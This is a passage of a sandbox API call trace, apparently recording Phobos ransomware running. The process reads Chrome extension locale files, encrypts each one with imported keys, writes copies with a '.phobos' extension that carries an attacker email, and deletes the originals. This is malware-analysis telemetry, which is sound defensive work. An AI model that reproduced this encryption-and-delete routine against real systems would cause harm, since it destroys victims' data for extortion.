lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf0, lpOverlapped=0x0) returned 1 [0160.729] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0160.729] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0160.729] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0160.729] CryptDestroyKey (hKey=0xa32da8) returned 1 [0160.729] WriteFile (in: hFile=0x17c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0160.730] CryptDestroyKey (hKey=0xa327e8) returned 1 [0160.730] CloseHandle (hObject=0x194) returned 1 [0160.730] CloseHandle (hObject=0x17c) returned 1 [0160.730] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\messages.json")) returned 1 [0160.731] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0160.731] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0160.731] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=268) returned 1 [0160.731] CloseHandle (hObject=0x17c) returned 1 [0160.731] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\messages.json")) returned 0x2020 [0160.731] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0160.731] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0160.732] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0160.732] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0160.732] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0160.983] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0160.983] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0160.983] ReadFile (in: hFile=0x17c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x10c, lpOverlapped=0x0) returned 1 [0160.983] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x110, dwBufLen=0x110 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x110) returned 1 [0160.984] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x110, lpOverlapped=0x0) returned 1 [0160.984] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0160.984] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0160.984] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0160.984] CryptDestroyKey (hKey=0xa32da8) returned 1 [0160.985] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0160.985] CryptDestroyKey (hKey=0xa327e8) returned 1 [0160.985] CloseHandle (hObject=0x17c) returned 1 [0160.985] CloseHandle (hObject=0x134) returned 1 [0160.985] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\messages.json")) returned 1 [0160.986] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0160.986] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0161.030] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=238) returned 1 [0161.030] CloseHandle (hObject=0x188) returned 1 [0161.030] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\messages.json")) returned 0x2020 [0161.030] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0161.030] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0161.030] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0161.030] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0161.030] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0161.031] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32968) returned 1 [0161.031] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0161.031] ReadFile (in: hFile=0x188, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xee, lpOverlapped=0x0) returned 1 [0161.032] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0, dwBufLen=0xf0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0) returned 1 [0161.032] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf0, lpOverlapped=0x0) returned 1 [0161.043] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0161.043] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0161.043] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0161.043] CryptDestroyKey (hKey=0xa32da8) returned 1 [0161.043] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0161.043] CryptDestroyKey (hKey=0xa32968) returned 1 [0161.043] CloseHandle (hObject=0x188) returned 1 [0161.043] CloseHandle (hObject=0x14c) returned 1 [0161.043] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\messages.json")) returned 1 [0161.044] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0161.044] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0161.045] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=210) returned 1 [0161.045] CloseHandle (hObject=0x14c) returned 1 [0161.045] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\messages.json")) returned 0x2020 [0161.045] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0161.045] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0161.045] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0161.045] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0161.045] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0161.045] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32968) returned 1 [0161.045] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0161.045] ReadFile (in: hFile=0x14c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xd2, lpOverlapped=0x0) returned 1 [0161.046] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0, dwBufLen=0xe0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0) returned 1 [0161.046] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xe0, lpOverlapped=0x0) returned 1 [0161.047] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0161.047] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0161.047] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0161.048] CryptDestroyKey (hKey=0xa32da8) returned 1 [0161.048] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0161.048] CryptDestroyKey (hKey=0xa32968) returned 1 [0161.048] CloseHandle (hObject=0x14c) returned 1 [0161.048] CloseHandle (hObject=0x188) returned 1 [0161.048] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\messages.json")) returned 1 [0161.049] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0161.049] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0161.049] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=222) returned 1 [0161.049] CloseHandle (hObject=0x188) returned 1 [0161.049] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\messages.json")) returned 0x2020 [0161.049] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0161.050] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0161.050] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0161.050] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0161.050] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0161.050] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32968) returned 1 [0161.050] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0161.050] ReadFile (in: hFile=0x188, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xde, lpOverlapped=0x0) returned 1 [0161.051] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0, dwBufLen=0xe0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0) returned 1 [0161.051] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xe0, lpOverlapped=0x0) returned 1 [0161.052] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0161.052] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0161.052] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0161.052] CryptDestroyKey (hKey=0xa32da8) returned 1 [0161.052] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0161.052] CryptDestroyKey (hKey=0xa32968) returned 1 [0161.052] CloseHandle (hObject=0x188) returned 1 [0161.052] CloseHandle (hObject=0x14c) returned 1 [0161.052] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\messages.json")) returned 1 [0161.059] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0161.059] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 